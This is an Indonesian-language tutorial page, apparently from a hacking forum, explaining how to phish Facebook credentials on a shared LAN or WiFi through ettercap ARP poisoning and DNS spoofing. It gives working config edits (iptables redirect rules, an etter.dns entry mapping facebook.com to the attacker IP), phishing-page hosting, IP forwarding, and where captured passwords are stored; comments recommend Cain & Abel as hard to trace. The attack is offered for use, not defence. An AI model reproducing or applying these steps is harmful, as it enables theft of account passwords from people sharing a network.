Kali aku bahas cara untuk sniffing via LAN ataupun Wifi, teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita. tehnik ini membutuhkan apache server, php, ettercap, script pishing. Hm, oiya tutorial ini uda sukses di tes pada Ubuntu 10.4. Ayo langsung saja ke pembahasan dari pada bertele-tele dalam introductionya. hehe..   Tutoria...

PISHING DENGAN TEKNIK DNS SPOFFING

 

Kali aku bahas cara untuk sniffing via LAN ataupun Wifi, teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita. tehnik ini membutuhkan apache server, php, ettercap, script pishing. Hm, oiya tutorial ini uda sukses di tes pada Ubuntu 10.4. Ayo langsung saja ke pembahasan dari pada bertele-tele dalam introductionya. hehe..

 

Tutorial ini aku ambil dari IndonesianCoder.com hasil treadnya mas yur4kh4, mau kontak? yur4kh4@yahoo.com.dan websitenya : http://devirakhjib.co.cc/ ,
Trimakasih untuk mas Yur4kh4 , ^_^  


>> PERSIAPAN 

yang perlu kita siapkan..
1. apache server
2. php
3. ettercap
4. script pishing
5. mental yg kuat & sedang tidak dalam keadaan mabuk.akakakaka.,.

aku anggap semua peralatan sudah di install..
cek apache2 yg di install tadi, ketik "localhost" pada web browser mu ..
klo ada tulisan "its works" < file index default dari server apache ada di /var/www
klo ga percaya cek saja...:D
yur4@localhost /var/www $ ls
index.html

>> CONFIGURE

konfigurasi ettercap
tempat konfigurasinya ada di /etc/etter.conf
yur4@localhost $ sudo gedit /etc/etter.conf
maka akan membuka file etter.conf dengan menggunakan gedit..
selanjutnya cari
#---------------
# Linux
#---------------
 
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
 
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hilangkan tanda pagarnya..sehingga menjadi sepert ini
#---------------
# Linux
#---------------
 
# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
 
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan...script
kalo sudah save...& jangan di ingat-ingat lagi...ahahahaa
selanjutnya..
rubah file etter.dns yang terdapat di /usr/share/ettercap
yur4@localhost $ gedit /usr/share/ettercap/etter.dns
delete isi etter.dns defaultnya dan ganti menjadi seperti ini
============================cut here=============================
facebook.com A 10.10.10.6
*.facebook.com A 10.10.10.6
www.facebook.com PTR 10.10.10.6 # Wildcards in PTR are not allowed
============================cut here=============================
sedikit penjelasan
facebook.com = site yang akan kita pishing
10.10.10.6 = IP attacker
NB:
untuk melihat ip
yur4@localhost $ ifconfig
kemudian save...

selanjutnya...copy file-file pishing kita ke /var/www
biasanya ada 3 file..index.php terserah.txt logs.php
sebelumnya di hapus aja dulu index.html defaultnya y...
beri perintah gini di file terserah.txt agar bisa di eksekusi..
root@localhost /var/www $ touch terserah.txt
root@localhost /var/www $ chmod 777 terserah.txt
okeyy... aku anggap sudah di copy ya...

>> EKSEKUSI

next...buka ettercap mu..
sekedar berbagi pengalaman saja..klo aku lebih suka membuka ettercap menggunakan mode console...:D

yur4@localhost $ sudo ettercap -C=mode/ -i=intercafe
-C bisa di ganti dengan -G=mode gui -T=mode text..
misal :
yur4@localhost $ ettercap -C -i eth0
aku akan melakukan sniffing pada network card LAN (local area network)
di sesuaikan sajsaa dengan network card yg activ di leppy or PC mu..
next...
pilih tab "sniff" >> unified sniffing >> pilih network card yg aktiv...[enter]
selanjutnya pada tab "host" >> scan host....
kemudia berangkat k tab "plugins" >> manage the plugins
aktivkan autoadd & dns_spoff
selanjutnya pada tab "mitm" >> arp poisoning..[centang/enter]
kemudia terakhir ke tab "start" >> start sniffing...:)
wew.,rumit deh kayak yah.,.hee...ngga' kok sebenarnya.,.klo dah biasa ga rumit ..:p
jangan senang dulu haruzs ada 1 hal lagi di lakukan...:p
yaitu meng-forward ip / berpura2 menjadi server lah.,
Langsung saja...masuk ke terminal ketikan perintah ini..
yur4@localhost $ sudo nano /proc/sys/net/ipv4/ip_forward
password : masukan password mu..
ganti angka 0 dengan angka 1 kemudian save....(ctrl+x >>y>>enter)

>> PENUTUP
sipp..! tinggal tunggu ...:p
lakukan dengan teman mu agar bisa langsung melihat hasilnya... tapi kalo ga percaya...
silahkan buka facebook.com
trus login..
seperti biasa password akan tersimpan di terserah.txt
bisa lihat di http://localhost/terserah.txt

About Author

Yudha Akbar Pramana


Comment & Discussions

  • Cecep Yusuf
    Tutorial sudah diapprove, tapi tolong gan dirapihin dulu tutorialnya, soalnya kodenya masih belum memakai syntax highlighter :D trus kontennya belum rapi, edit ke HTML mode, trus delete semua 'div' yang membungkus paragraf kasian orang yang baca nanti soalnya terlalu rapat teksnya. :)

  • anakhilang
    klo yang pake windows mah mending pake CA aja, selain mudah pakenya, racunnya ampuh dan sulit pula kelacaknya ^_^

  • ini pythonnya di sebelah mana ya ??

    adminnya kok gak baca sih ...

  • Himran Nababan
    Kerjaan gamer yang kreatif, tapi script phising nya mana nih?

  • Please LOGIN before if you want to give the comment.